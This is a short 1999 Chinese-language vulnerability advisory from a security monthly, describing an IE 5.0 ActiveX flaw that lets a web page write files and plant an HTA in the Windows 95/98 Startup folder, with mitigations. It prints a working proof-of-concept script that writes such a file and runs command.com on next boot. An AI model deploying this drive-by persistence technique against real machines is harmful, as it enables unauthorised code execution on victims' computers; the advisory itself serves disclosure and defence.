绿盟安全月刊->第1期->最新漏洞 IE 5.0 ActiveX 的重大漏洞

整理：solo
主页：http://www.nsfocus.com
日期：1999-09-15


这个漏洞主要就是AcriveX控件，它允许创建和覆写本地文件。黑客可以在IE用户点击网页上的一个超链接时发生，这个漏洞可以将HTML应用程序文件中的可执行程序添加在Windows 95或98计算机的开始菜单中，在该机器下
次启动时，程序就会执行。

补救方法：

1) 把安全级别设置为“High”
2) 或是把 Active Scripting 给屏蔽掉
3) 或把 ActiveX Controls 和 plug-ins 都给关了

这个漏洞可以用下面的代码来测试：

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

好象Windows 2000下的 IE5.00.2919.800 没有这个漏洞.